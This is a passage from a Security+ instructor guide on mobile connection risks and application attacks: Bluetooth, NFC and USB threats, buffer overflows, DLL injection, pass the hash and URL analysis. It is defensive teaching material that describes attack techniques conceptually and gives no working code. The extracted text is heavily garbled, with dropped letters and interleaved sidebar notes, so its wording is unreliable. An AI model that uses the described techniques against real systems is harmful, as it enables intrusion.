user establishes a connection to a corporate network using strong WPA3 security, Connection Methods
there is a fairly low risk of eavesdropping or man-in-the-middle attacks. The risks from
Wi-Fi come from users connecting to open access points or possibly a rogue access
point imitating a corporate network. These allow the access point owner to launch any
number of attacks, even potentially compromising sessions with secure servers using
a DN spoofing attack, for instance .

Personal Area Networks (PANs)

Personal area networks (PANs) enable connectivity between a mobile device and
peripherals. Ad hoc or peer to peer networks between mobile devices or between
mobile devices and other computing devices can also be established. In terms of
corporate security, these peer-to-peer functions should generally be disabled. It might
be possible for an attacker to e ploit a misconfigured device and obtain a bridged
connection to the corporate network.

Ad Hoc Wi-Fi and Wi-Fi Direct

Wireless stations can establish peer-to-peer connections with one another, rather than
using an access point. This can also called be called an ad hoc network, meaning that
the network is not made permanently available. There is no established, standards-
based support for ad hoc networking, however. MITRE have a project to enable Android
smartphones to configure themselves in an ad hoc network mitre.org/research/
technology-transfer/open-source-software/smartphone-ad-hoc-networking-span).
i i Direct allows one to one connections between stations, though in this case one
of the devices actually functions as a soft access point. i i Direct depends on i i
rotected etup , which has many vulnerabilities. Android supports operating as
a i i Direct A , but i uses a proprietary multipeer connectivity framework. ou can
connect an iOS device to another device running a Wi-Fi direct soft AP, however.
There are also wireless mesh products from vendors such as Netgear and oogle
that allow all types of wireless devices to participate in a peer-to-peer network. These
products might not be interoperable, though more are now supporting the EasyMesh
standard wi fi.org discover wi fi wi fi easymesh).

Tethering and Hotspots

A smartphone can share its Internet connection with another device, such as a PC.
Where this connection is shared over Wi-Fi with multiple other devices, the smartphone

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 358 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

can be described as a hotspot. Where the connection is shared by connecting the

smartphone to a PC over a USB cable or with a single PC via Bluetooth, it can be
referred to as tethering. However, the term "Wi-Fi tethering" is also quite widely
used to mean a hotspot. This type of functionality would typically be disabled when
the device is connected to an enterprise network, as it might be used to circumvent
security mechanisms, such as data loss prevention or a web content filtering policies.

Show Slide(s) luetooth Connection ethods

Bluetooth Connection
luetooth is one of the most popular technologies for implementing ANs. hile native
Methods Bluetooth has fairly low data rates, it can be used to pair with another device and then
use a Wi-Fi link for data transfer. This sort of connectivity is implemented by iOS's
AirDrop feature.
Bluetooth devices have a few known security issues:
• Device discovery a device can be put into discoverable mode meaning that it will
connect to any other Bluetooth devices nearby. Unfortunately, even a device in non-
discoverable mode is quite easy to detect.

• Authentication and authori ation devices authenticate pair using a simple

passkey configured on both devices. This should always be changed to some secure
phrase and never left as the default. Also, check the device's pairing list regularly to
confirm that the devices listed are valid.

• Malware—there are proof-of-concept Bluetooth worms and application exploits,

most notably the lue orne e ploit armis.com/blueborne), which can compromise
any active and unpatched system regardless of whether discovery is enabled
and without requiring any user intervention. There are also vulnerabilities in
the authentication schemes of many devices. eep devices updated with the
latest firmware.

Pairing a computer with a smartphone. (Screenshot used with permission from icrosoft.)

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 359

It is also the case that using a control center toggle may not actually turn off the luetooth
radio on a mobile device. If there is any doubt about patch status or exposure to
vulnerabilities, luetooth should be fully disabled through device settings.

nless some sort of authentication is configured, a discoverable device is vulnerable to

bluejacking, a sort of spam where someone sends you an unsolicited te t or picture
video message or vCard contact details . This can also be a vector for malware,
as demonstrated by the bad Android Tro an malware securelist.com/the-most-
sophisticated-android-trojan/35929).
luesnarfin refers to using an exploit in Bluetooth to steal information from
someone else's phone. The e ploit now patched allows attackers to circumvent
the authentication mechanism. ven without an e ploit, a short digit IN code is
vulnerable to brute force password guessing.
ther significant risks come from the device being connected to. A peripheral device
with malicious firmware can be used to launch highly e ective attacks. This type of
risk has a low likelihood, as the resources required to craft such malicious peripherals
are demanding.

Infrared and RFID Connection Methods Show Slide(s)

Infrared signaling has been used for AN in the past IrDA , but the use of infrared in Infrared and ID
modern smartphones and wearable technology focuses on two other uses: Connection Methods
• IR blaster—this allows the device to interact with an IR receiver and operate a device
such as a TV or HVAC monitor as though it were the remote control handset.

• I sensor these are used as pro imity sensors to detect when a smartphone is
being held to the ear, for instance and to measure health information such as
heart rate and blood o ygen levels .

Radio Frequency ID (RFID) is a means of encoding information into passive tags,

which can be easily attached to devices, structures, clothing, or almost anything else. A
passive tag can have a range from a few centimeters to a few meters. When a reader
is within range of the tag, it produces an electromagnetic wave that powers up the tag
and allows the reader to collect information from it or to change the values encoded in
the tag. There are also battery-powered active tags that can be read at much greater
distances hundreds of meters . Show Slide(s)
ne type of ID attack is skimming, which is where an attacker uses a fraudulent
ID reader to read the signals from a contactless bank card. Any reader can access Near ield
any data stored on any ID tag, so sensitive information must be protected using Communications
cryptography. It is also possible in theory to design ID tags to in ect malicious code and Mobile Payment
to try to exploit a vulnerability in a reader. ervices

Teaching
ear ield Communications and o ile a ment er ices Tip
Sophos Security has
NFC is based on a particular type of radio fre uency ID ID . N C sensors and
produced a video
functionality are now commonly incorporated into smartphones. An N C chip can about N C card
also be used to read passive ID tags at close range. It can also be used to configure skimming facebook.
other types of connections pairing luetooth devices for instance and for e changing com/SophosSecurity/
information, such as contact cards. An N C transaction is sometimes known as a bump, videos/
named after an early mobile sharing app, later redeveloped as Android Beam, to use 10155345347100017).
They also evaluate
N C. The typical use case is in smart posters, where the user can tap the tag in the card and wallet
poster to open a linked web page via the information coded in the tag. Attacks could protectors designed
be developed using vulnerabilities in handling the tag securityboulevard.com/2019/10/ to block N C
nfc-false-tag-vulnerability-cve-2019-9295). It is also possible that there may be some transmissions.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 360 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

way to e ploit N C by crafting tags to direct the device browser to a malicious web
page where the attacker could try to exploit any vulnerabilities in the browser.
N C does not provide encryption, so eavesdropping and man in the middle attacks are
possible if the attacker can find some way of intercepting the communication and the
software services are not encrypting the data.
The widest application of N C is to make payments via contactless point of sale o
machines. To configure a payment service, the user enters their credit card information
into a mobile wallet app on the device. The wallet app does not transmit the original
credit card information, but a one-time token that is interpreted by the card merchant
and linked backed to the relevant customer account. There are three major mobile
wallet apps Apple ay, oogle ay formerly Android ay , and amsung ay.
Despite having a close physical pro imity re uirement, N C is vulnerable to several
types of attacks. Certain antenna configurations may be able to pick up the signals
emitted by N C from several feet away, giving an attacker the ability to eavesdrop
from a more comfortable distance. An attacker with a reader may also be able to skim
information from an N C device in a crowded area, such as a busy train. An attacker
may also be able to corrupt data as it is being transferred through a method similar
to a Do attack by ooding the area with an e cess of signals to interrupt the
transfer.

Skimming a credit or bank card will give the attacker the long card number and expiry date.
Completing fraudulent transactions directly via C is much more difficult as the attacker
would have to use a valid merchant account and fraudulent transactions related to that
account would be detected very uickly.

Show Slide(s) USB Connection Methods

USB Connection
Android devices can be connected to a computer via the USB port. Apple devices
Methods require a lightning-to-USB converter cable. Once attached the computer can access the
device's hard drive, sync or backup apps, and upgrade the firmware.
Teaching
Some Android USB ports support USB On The Go (OTG) and there are adapters for
Tip
iOS devices. USB OTG allows a port to function either as a host or as a device. For
This attack vector example, a port on a smartphone might operate as a device when connected to a
doesn't seem to have
PC, but as a host when connected to a keyboard or external hard drive. The extra pin
many actual exploits
associated with it, communicates which mode the port is in.
but you could refer There are various ways in which USB OTG could be abused. Media connected to
students to Wall of
Sheep's Juice-Jacking
the smartphone could host malware. The malware might not be able to a ect the
page wallofsheep. smartphone itself but could be spread between host computers or networks via the
com/pages/juice). device. It is also possible that a charging plug could act as a Trojan and try to install
apps referred to as uice acking , though modern versions of both i and Android
now require authorization before the device will accept the connection.

Show Slide(s) C and ush otifications

SMS/MMS/RCS and
The Short Message Service (SMS) and Multimedia Message Service (MMS) are
ush Notifications operated by the cellular network providers. They allow transmission of text messages
and binary files. ulnerabilities in M and the signaling protocol that underpins
it have cast doubt on the security of step verification mechanisms kaspersky.com/
blog/ss7-hacked/25529).
Rich Communication Services (RCS) is designed as a platform-independent advanced
messaging app, with a similar feature set to proprietary apps like WhatsApp and
iMesssage. These features include support for video calling, larger binary attachments,

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 361

group messaging/calling, and read receipts. RCS is supported by carriers via Universal
rofile for Advanced Messaging gsma.com futurenetworks digest universal profile
version-2-0-advanced-rcs-messaging). The main drawbacks of RCS are that carrier
support is patchy messages fallback to M if C is not supported and there is no
end to end encryption, at the time of writing theverge.com/2020/5/27/21271186/
google rcs t mobile encryption ccmi universal profile).
ulnerabilities in processing attachments and rich formatting have resulted in Do
attacks against certain handsets in the past, so it is important to keep devices patched
against known threats.
ush notifications are store services such as Apple ush Notification ervice and
oogle Cloud to Device Messaging that an app or website can use to display an alert
on a mobile device. sers can choose to disable notifications for an app, but otherwise
the app developer can target notifications to some or all users with that app installed.
Developers need to take care to properly secure the account and services used to
send push notifications. There have been e amples in the past of these accounts being
hacked and used to send fake communications.

Firmware Over-the-Air Updates Show Slide(s)

A baseband update modifies the firmware of the radio modem used for cellular, i i, Firmware Over-the-Air
luetooth, N C, and connectivity. The radio firmware in a mobile device contains Updates
an operating system that is separate from the end user operating system for e ample,
Android or iOS). The modem uses its own baseband processor and memory, which
boots a real time operating system T . An T is often used for time sensitive
embedded controllers, of the sort required for the modulation and frequency shifts
that underpin radio-based connectivity.
The procedures for establishing radio connections are complex and require strict
compliance with regulatory certification schemes, so incorporating these functions in
the main OS would make it far harder to bring OS updates to market. Unfortunately,
baseband operating systems have been associated with several vulnerabilities over the
years, so it is imperative to ensure that updates are applied promptly. These updates
are usually pushed to the handset by the device vendor, often as part of OS upgrades.
The updates can be delivered wirelessly, either through a Wi-Fi network or the data
connection, referred to as over-the-air (OTA). A handset that has been jailbroken
or rooted might be able to be configured to prevent baseband updates or apply a
particular version manually, but in the general course of things, there is little reason to
do so.
There are various ways of exploiting vulnerabilities in the way these updates work. A
well-resourced attacker can create an "evil base station" using a Stingray/International
Mobile ubscriber Identity IM I catcher. This will allow the attacker to identify the
location of cell devices operating in the area. In some circumstances it might be
possible to launch a man in the middle attack and abuse the firmware update process
to compromise the phone.

Microwave Radio Connection Methods Show Slide(s)

Cellular networks are microwave radio networks provisioned for multiple subscribers. Microwave Radio
Microwave radio is also used as a backhaul link from a cell tower to the service Connection Methods
provider's network. These links are important to 5G, where many relays are required
and provisioning fiber optic cabled backhaul can be difficult. rivate microwave links
are also used between sites. A microwave link can be provisioned in two modes:
• Point-to-point (P2P) microwave uses high gain antennas to link two sites. High
gain means that the antenna is highly directional. Each antenna is pointed directly
at the other. In terms of security, this makes it difficult to eavesdrop on the signal,

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 362 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

as an intercepting antenna would have to be positioned within the direct path. The
satellite modems or routers are also normally paired to one another and can use
over-the-air encryption to further mitigate against snooping attacks.

• Point-to-multipoint (P2M) microwave uses smaller sectoral antennas, each

covering a separate quadrant. Where P2P is between two sites, P2M links multiple
sites or subscriber nodes to a single hub. This can be more cost efficient in high
density urban areas and requires less radio spectrum. Each subscriber node is
distinguished by multiplexing. Because of the higher risk of signal interception
compared to P2P, it is crucial that links be protected by over-the-air encryption.

Multipoint can be used in other contexts. For example, Bluetooth supports a multipoint
mode. This can be used to connect a headset to multiple sources a C and a
smartphone, for instance) simultaneously.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 363

Review Activity:
Secure o ile e ice onnections
Answer the following questions:

1. How might wireless connection methods be used to compromise the

security of a mobile device processing corporate data?

An attacker might set up some sort of rogue access point i i or cell tower cellular
to perform eavesdropping or man in the middle attacks. or ersonal Area Network
AN range communications, there might be an opportunity for an attacker to run
exploit code over the channel.

2. Why might enforcement policies be used to prevent USB tethering when a

smartphone is brought to the workplace?

This would allow a PC or laptop to connect to the Internet via the smartphone's cellular
data connection. This could be used to evade network security mechanisms, such as
data loss prevention or content filtering.

3. True or false? A maliciously designed USB battery charger could be used to

exploit a mobile device on connection.

True in theory though the vector is known to the mobile and handset vendors so
the exploit is unlikely to be able to run without user authorization.

4. Chuck, a sales executive, is attending meetings at a professional conference

that is also being attended by representatives of other companies in his
field At the con erence he uses his smartphone ith a luetooth headset
to sta in touch ith clients A e da s a ter the con erence he finds that
competitors' sales representatives are getting in touch with his key contacts
and in uencin them re ealin hat he thou ht as pri ate in ormation
from his email and calendar. Chuck is a victim of which wireless threat?

luesnarfing.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 364 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 13
Summary
Teaching You should be able to use endpoint management solutions to apply device and
Tip application enforcement and monitoring and understand risks from mobile connection
Check that students methods and other technologies.
are confident about
the content that has
been covered. If there Guidelines for Implementing Secure Mobile Solutions
is time, re-visit any
content examples that Follow these guidelines when you deploy or reassess mobile device and application
they have questions management:
about. If you have
used all the available
• elect a mobile deployment model that best fits organi ation security re uirements
time for this lesson and employee business needs D, C ,C ,C D.
block, note the issues,
and schedule time for • Deploy a mobile universal endpoint management platform to set device and
a review later in the application policies:
course.
• Allowed connection methods cellular, i i, tethering, and luetooth .

• Authentication re uirements screen locks, biometric, IN, conte t aware .

• locked device functions geotagging, camera, microphone .

• locking of rooted ailbroken custom firmware carrier unlocked devices.

• Sideloading, workspaces, and storage segmentation for enterprise apps and

data.

• Device encryption and remote wipe.

Lesson 13: Implementing Secure Mobile Solutions

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 14
Summarizing Secure
Application oncepts

LESSON INTRODUCTION Teaching

Tip
Automation strategies for resiliency, disaster recovery, and incident response This lesson covers
put development (programming and scripting) at the heart of secure network both application
administration and operations (DevSecOps). As well as automating operations, more attacks and secure
companies are having to maintain bespoke code in customer-facing software, such as coding practices. The
web applications. Consequently, secure application development is a competency that importance of coding
examples grows
will only grow in importance over the course of your career. with each syllabus
release, and there
Lesson Objectives are a lot of fairly
complex concepts to
get through, so be
In this lesson, you will:
prepared to allocate
• Analyze indicators of application attacks. plenty of time to
covering this content.
• Analyze indicators of web application attacks.

• Summarize secure coding practices.

• Implement secure script environments.

• Summarize deployment and automation concepts.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 366 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 14A
Analyze Indicators
o Application Attacks

Teaching EXAM OBJECTIVES COVERED

Tip 1.3 Given a scenario, analyze potential indicators associated with application attacks
This topic focuses
on attacks against
binary code and the Attacks against desktop and server applications allow threat actors to run arbitrary
compromise of hosts
code on trusted hosts, allowing them to gain a foothold on the network or move
bu er over ow and
privilege escalation). laterally within it. ith sufficient privileges and access, an attacker can uickly move to
compromising data assets or causing denial of service against critical servers. Not all
of these attacks will be detected automatically, so as a security professional, you must
be able to identify indicators of arbitrary code execution and privilege escalation from
your host monitoring and logging systems.

Show Slide(s) Application Attacks

Application Attacks
An application attack targets a vulnerability in OS or application software. An
application vulnerability is a design aw that can cause the application security system
Teaching to be circumvented or that will cause the application to crash.
Tip
Note that in most
Privilege Escalation
cases, a successful
attack can only be
The purpose of most application attacks is to allow the threat actor to run his or her
identified through own code on the system. This is referred to as arbitrary code execution. Where the
the behavior of the code is transmitted from one machine to another, it can be referred to as remote code
compromised process execution. The code would typically be designed to install some sort of backdoor or to
of host, in terms of file disable the system in some way (denial of service).
system and network
activity. An application or process must have privileges to read and write data and execute
functions. Depending on how the software is written, a process may run using a system
account, the account of the logged-on user, or a nominated account. If a software exploit
works, the attacker may be able to execute arbitrary code with the same privilege level as
the exploited process. There are two main types of privilege escalation:
• Vertical privilege escalation (or elevation) is where a user or application can
access functionality or data that should not be available to them. For instance, a
process might run with local administrator privileges, but a vulnerability allows the
arbitrary code to run with higher system privileges.

• Horizontal privilege escalation is where a user accesses functionality or data

that is intended for another user. For instance, via a process running with local
administrator privileges on a client workstation, the arbitrary code is able to execute
as a domain account on an application server.

Without performing detailed analysis of code or process execution in real time, it is

privilege escalation that provides the simplest indicator of an application attack. If process
logging has been configured varonis.com/blog/sysmon-threat-detection-guide), the audit
log can provide evidence of privilege escalation attempts. These attempts may also be
detected by incident response and endpoint protection agents, which will display an alert.

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 367

Error Handling
An application attack may cause an error message. In Windows, this may be of the
following types Instruction could not be read or written, ndefined e ception,
or "Process has encountered a problem." One issue for error handling is that the
application should not reveal configuration or platform details that could help an
attacker. For example, an unhandled exception on a web application might show an
error page that reveals the type and configuration of a database server.

Improper Input andlin

Most software accepts user input of some kind, whether the input is typed manually or
passed to the program by another program, such as a browser passing a URL to a web
server or a Windows process using another process via its application programming
interface. Good programming practice dictates that input should be tested to ensure
that it is valid; that is, the sort of data expected by the receiving process. Most
application attacks work by passing invalid or maliciously constructed data to the
vulnerable process. There are many ways of exploiting improper input handling, but
many attacks can be described as either over ow type attacks or in ection type attacks.

er o ulnera ilities Show Slide(s)

In an over ow attack, the threat actor submits input that is too large to be stored in
ver ow
a variable assigned by the application. ome of the general over ow vulnerabilities
Vulnerabilities
are discussed here. To keep up to date with specific attack methods and new types of
attack, monitor a site such as OWASP (owasp.org/www-community/attacks). Ideally, the Teaching
code used to attempt these attacks will be identified by network ID or by an endpoint Tip
protection agent. Unsuccessful attempts may be revealed through unexplained crashes To protect against
or error messages following a file download, e ecution of a new app or a script, or software exploitation,
connection of new hardware. apply security
patches (for third-
u er er o party applications) or
secure programming
A bu er is an area of memory that the application reserves to store e pected data. To practice (for your own
exploit a u er o er o vulnerability, the attacker passes data that deliberately overfills applications).
the bu er. ne of the most common vulnerabilities is a stack over ow. The stack is an OWASP is a great
area of memory used by a program subroutine. It includes a return address, which is the resource for more
location of the program that called the subroutine. An attacker could use a bu er over ow detailed information.
to change the return address, allowing the attacker to run arbitrary code on the system. As EternalBlue
shows, an exploit
might use several
attack techniques
to compromise
vulnerable code.

hen executed normally, a function will return control to the calling function. If the code
is vulnerable, an attacker can pass malicious data to the function, over ow the stack,
and run arbitrary code to gain a shell on the target system.

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 368 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Inte er er o
An integer is a positive or negative number with no fractional component (a whole
number . Integers are widely used as a data type, where they are commonly defined
with fi ed lower and upper bounds. An inte er o er o attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive
number to become negative (changing a bank debit to a credit, for instance). It could
also be used where the software is calculating a bu er si e if the attacker is able to
make the bu er smaller than it should be, he or she may then be able to launch a
bu er over ow attack.

Eternal lue is an example of an exploit that uses vulnerabilities in integer over ow to effect
a buffer over ow and gain system privileges on a indows host (sentinelone.com/blog/
eternalblue-nsa-developed-exploit-just-wont-die).

Show Slide(s) ull ointer ere erencin and ace Conditions

Null Pointer
In C/C++ programming, a pointer is a variable that stores a memory location, rather
Dereferencing and than a value. Attempting to read or write that memory address via the pointer is called
ace Conditions dereferencing. If the memory location is invalid or null (perhaps by some malicious
process altering the execution environment), this creates a null pointer dereference
Teaching type of exception and the process will crash, probably. In some circumstances, this
Tip might also allow a threat actor to run arbitrary code. Programmers can use logic
Note that statements to test that a pointer is not null before trying to use it.
dereferencing does
not mean "deleting" or A race condition is one means of engineering a null pointer dereference exception.
"removing;" it means Race conditions occur when the outcome from an execution process is directly
"read" or "resolve." dependent on the order and timing of certain events, and those events fail to execute
The code is taking in the order and timing intended by the developer. In 2016, the Linux kernel was
a reference to a discovered to have an exploitable race condition vulnerability, known as Dirty COW
memory address and
returning the value. A
(theregister.com/2016/10/21/linux_privilege_escalation_hole).
null pointer exception ace condition attacks can also be directed at databases and file systems. A time
occurs when this
of check to time of use (TOCTTOU) race condition occurs when there is a change
reference value is null
or invalid. between when an app checked a resource and when the app used the resource. This
change invalidates the check. An attacker that can identify a TOCTTOU vulnerability
will attempt to manipulate data after it has been checked but before the application
can use this data to perform some operation. For example, if an application creates a
temporary file to store a value for later use, and an attacker can replace or delete this
file between the time it is created and the time it is used, then the attacker is e ploiting
a TOCTTOU vulnerability.

Show Slide(s) Memory Leaks and Resource Exhaustion

Memory Leaks and
If a process is operating correctly, when it no longer requires a block of memory, it
Resource Exhaustion should release it. If the program code does not do this, it could create a situation
where the system continually leaks memory to the faulty process. This means less
memory is available to other processes and the system could crash. Memory leaks
are particularly serious in service/background applications, as they will continue
to consume memory over an extended period. Memory leaks in the OS kernel
are also extremely serious. A memory leak may itself be a sign of a malicious or
corrupted process.
More generally, a malicious process might cause denial of service or set up the
conditions for privilege escalation via resource exhaustion. Resources refers to
C time, system memory allocation, fi ed disk capacity, and network utili ation. A

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 369

malicious process could spawn multiple looping threads to use up CPU time, or write
thousands of files to disk. Distributed attacks against network applications perform a
type of resource exhaustion attack by starting but not completing sessions, causing
the application to fill up its state table, leaving no opportunities for genuine clients
to connect.

DLL Injection and Driver Manipulation Show Slide(s)

A dynamic link library (DLL) is a binary package that implements some sort of standard DLL In ection and
functionality, such as establishing a network connection or performing cryptography. Driver Manipulation
The main process of a software application is likely to load several DLLs during the
normal course of operations. Teaching
Tip
DLL injection is a vulnerability in the way the operating system allows one process to
attach to another. This functionality can be abused by malware to force a legitimate Stress to students
that like any file,
process to load a malicious link library. The link library will contain whatever functions DLLs and drivers
the malware author wants to be able to run. Malware uses this technique to move from should only be run or
one host process to another to avoid detection. A process that has been compromised installed if they are
by DLL in ection might open une pected network connections, or interact with files and signed with a valid
the registry suspiciously. certificate from a
reputable vendor.
To perform DLL in ection the malware must already be operating with sufficient
privileges, typically local administrator or system privileges. It must also evade
detection by antivirus software. One means of doing this is code refactoring.
Refactoring means that the code performs the same function by using di erent
methods (control blocks, variable types, and so on). Refactoring means that the A-V
software may no longer identify the malware by its signature.
function calls to allow DLL in ection are legitimately used for operations such
as debugging and monitoring. Another opportunity for malware authors to exploit
these calls is the Windows Application Compatibility framework. This allows legacy
applications written for an OS, such as Windows XP, to run on later versions. The code
library that intercepts and redirects calls to enable legacy mode functionality is called a
shim. The shim must be added to the registry and its files packed in a shim database
. D file added to the system folder. The shim database represents a way that
malware with local administrator privileges can run on reboot (persistence). Show Slide(s)

Pass the Hash Attack Pass the Hash Attack

A threat actor has to be either relatively lucky to find an unpatched vulnerability, or Teaching
well-resourced enough to develop a zero-day exploit. Once an initial foothold has been Tip
gained, the threat actor may try to find simpler ways to move around the network. You might also want to
mention golden ticket
Attackers can extend their lateral movement by a great deal if they are able to attacks (youtube.com/
compromise host credentials. One common credential exploit technique for lateral watch?v=
movement is called pass the hash (PtH). This is the process of harvesting an account's lJQn06QLwEw).
cached credentials when the user is logged into a single sign-on (SSO) system so the If students are
attacker can use the credentials on other systems. If the threat actor can obtain the interested in learning
hash of a user password, it is possible to present the hash (without cracking it) to more about Pass
the Hash and ticket
authenticate to network protocols such as the Windows File Sharing protocol Server
forging, refer them
Message Block (SMB), and other protocols that accept NTLM hashes as authentication to the briefing here
credentials. or e ample, most indows domain networks are configured to allow media.blackhat.com/
NTLM as a legacy authentication method for services. The attacker's access isn't ust bh us riefings
limited to a single host, as they can pass the hash onto any computer in the network Duckwall/BH_US_12_
that is tied to the domain. This drastically cuts down on the e ort the threat actor must Duckwall_Campbell_
Still_Passing_WP.pdf
spend in moving from host to host.

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 370 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ass the hash is relatively difficult to detect, as it e ploits legitimate network behavior.
A detection system can be configured to correlate a se uence of security log events
using NTLM-type authentication, but this method can be prone to false positives
(blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/).

The pass the hash process. (Images 1 .com.)

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 371

Review Activity:
Indicators o Application Attacks
Answer the following questions:

1. Your log shows that the Notepad process on a workstation running as

the local administrator account has started an unknown process on an
application server running as the SYSTEM account. What type of attack(s)
are represented in this intrusion event?

The Notepad process has been compromised, possibly using bu er over ow or a DLL
process in ection attack. The threat actor has then performed lateral movement and
privilege escalation, gaining higher privileges through remote code execution on the
application server.

2. o mi ht an inte er o er o e used as part o a u er o er o

The integer value could be used to allocate less memory than a process expects,
making a bu er over ow easier to achieve.

3. You are providing security advice and training to a customer's technical

team ne as s ho the can identi hen a u er o er o occurs hat
is your answer?

eal time detection of a bu er over ow is difficult, and is typically only achieved by

security monitoring software (antivirus, endpoint detection and response, or user
and entity behavior analytics) or by observing the host closely within a sandbox. An
unsuccessful attempt is likely to cause the process to crash with an error message. If
the attempt is successful, the process is likely to show anomalous behavior, such as
starting another process, opening network connections, or writing to AutoRun keys in
the registry. These indicators can be recorded using logging and system monitoring
tools.

4. hat is the e ect o a memor lea

A process claims memory locations but never releases them, reducing the amount of
memory available to other processes. This will damage performance, could prevent
other processes from starting, and if left unchecked could crash the OS.

5. How can DLL injection be exploited to hide the presence of malware?

Various OS system functions allow one process to manipulate another and force it to
load a dynamic link library (DLL). This means that the malware code can be migrated
from one process to another, evading detection.

6. Other than endpoint protection software, what resource can provide

indicators of pass the hash attacks?

These attacks are revealed by use of certain modes of NTLM authentication within the
security (audit) log of the source and target hosts. These indicators can be prone to
false positives, however, as many services use NTLM authentication legitimately.

esson 1 Summarizing Secure Application Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 372 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 14B
Analyze Indicators of Web
Application Attacks

Teaching EXAM OBJECTIVES COVERED

Tip 1.3 Given a scenario, analyze potential indicators associated with application attacks
This topic deals with
the remainder of the
application attack
A web application exposes many interfaces to public networks. Attackers can exploit
content examples,
which mostly refer vulnerabilities in server software and in client browser security to perform in ection
to web application and session hi acking attacks that compromise data confidentiality and integrity.
server and client Understanding how the vectors and vulnerabilities exploited by these attacks will help
vulnerabilities and you to identify and remediate configuration weaknesses in your systems.
exploits.

Show Slide(s) Uniform Resource Locator Analysis

As well as pointing to the host or service location on the Internet (by domain name
Uniform Resource
Locator Analysis
or IP address), a uniform resource locator (URL) can encode some action or data to
submit to the server host. This is a common vector for malicious activity.
Teaching
Tip
Make sure students
can interpret the
parts of a URL and
are familiar with
the general process
of HTTP requests
and responses and
methods.

Uniform resource locator (U ) analysis.

HTTP Methods
As part of URL analysis, it is important to understand how HTTP operates. An HTTP
session starts with a client (a user-agent, such as a web browser) making a request to
an HTTP server. The connection establishes a TCP connection. This TCP connection can
be used for multiple re uests, or a client can start new TC connections for di erent
requests. A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body. The principal method is GET, used to retrieve a
resource. Other methods include:

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 373

• POST—send data to the server for processing by the requested resource.

• PUT—create or replace the resource. DELETE can be used to remove the resource.
• HEAD—retrieve the headers for a resource only (not the body).
Data can be submitted to a server either by using a POST or PUT method and the HTTP
headers and body, or by encoding the data within the URL used to access the resource.
Data submitted via a URL is delimited by the ? character, which follows the resource
path. Query parameters are usually formatted as one or more name=value pairs,
with ampersands delimiting each pair. A URL can also include a fragment or anchor
ID, delimited by #. The fragment is not processed by the web server. An anchor ID is
intended to refer to a section of a page but can be misused to in ect Java cript.
The server response comprises the version number and a status code and message, plus
optional headers, and message body. An HTTP response code is the header value returned
by a server when a client requests a URL, such as 200 for "OK" or 404 for "Not Found."

Percent Encoding
A URL can contain only unreserved and reserved characters from the ASCII set.
Reserved ASCII characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control characters,
such as null string termination, carriage return, line feed, end of file, and tab, are
unsafe. Percent encoding allows a user-agent to submit any safe or unsafe character
(or binary data) to the server within the URL. Its legitimate uses are to encode reserved
characters within the URL when they are not part of the URL syntax and to submit
Unicode characters. Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input. Percent encoding can
exploit weaknesses in the way the server application performs decoding. Consequently,
URLs that make unexpected or extensive use of percent encoding should be treated
carefully. You can use a resource such as W3 Schools (w3schools.com/tags/ref_
urlencode.asp) for a complete list of character codes, but it is helpful to know some of
